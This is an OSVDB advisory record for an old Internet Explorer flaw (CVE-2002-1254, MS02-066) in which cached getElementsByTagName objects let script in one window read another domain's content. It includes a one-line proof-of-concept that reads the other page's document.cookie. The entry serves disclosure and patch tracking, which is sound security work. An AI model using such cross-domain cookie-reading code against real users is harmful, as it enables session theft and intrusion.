Microsoft IE getElementsByTagName Object Caching

2002-10-04T00:00:00
ID OSVDB:2984
Type osvdb
Reporter OSVDB
Modified 2002-10-04T00:00:00

Description

Vulnerability Description

Microsoft Internet Explorer contains a flaw that may allow a remote attacker to execute malicious JavaScript in restricted domains. The issue is caused when two windows communicate and the security checks that ensure both pages are in the same security zone/domain wrongly assume that certain cached objects are only called through their respective window. This incorrect assumption allows the remote attacker to provide interoperability between seperate documents. This would allow the attacker to gain access site content, steal cookies, read files from the local machine or execute program's on the victim computer.

Technical Description

Each item in the list below consists of three parts, "Cache" shows how to cache the vulnerable object, "Exploit" shows how the vulnerability works in context and "Impact" details the implications of the vulnerability.

getElementsByTagName

Cache: var fVuln=oWin.document.getElementsByTagName; Exploit: alert(fVuln("BODY")[0].document.cookie); Impact: Full access.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

Short Description

Microsoft Internet Explorer contains a flaw that may allow a remote attacker to execute malicious JavaScript in restricted domains. The issue is caused when two windows communicate and the security checks that ensure both pages are in the same security zone/domain wrongly assume that certain cached objects are only called through their respective window. This incorrect assumption allows the remote attacker to provide interoperability between seperate documents. This would allow the attacker to gain access site content, steal cookies, read files from the local machine or execute program's on the victim computer.

References:

Microsoft Security Bulletin: MS02-066 ISS X-Force ID: 10438 Generic Informational URL: http://sec.greymagic.com/adv/gm012-ie/ CVE-2002-1254 Bugtraq ID: 6028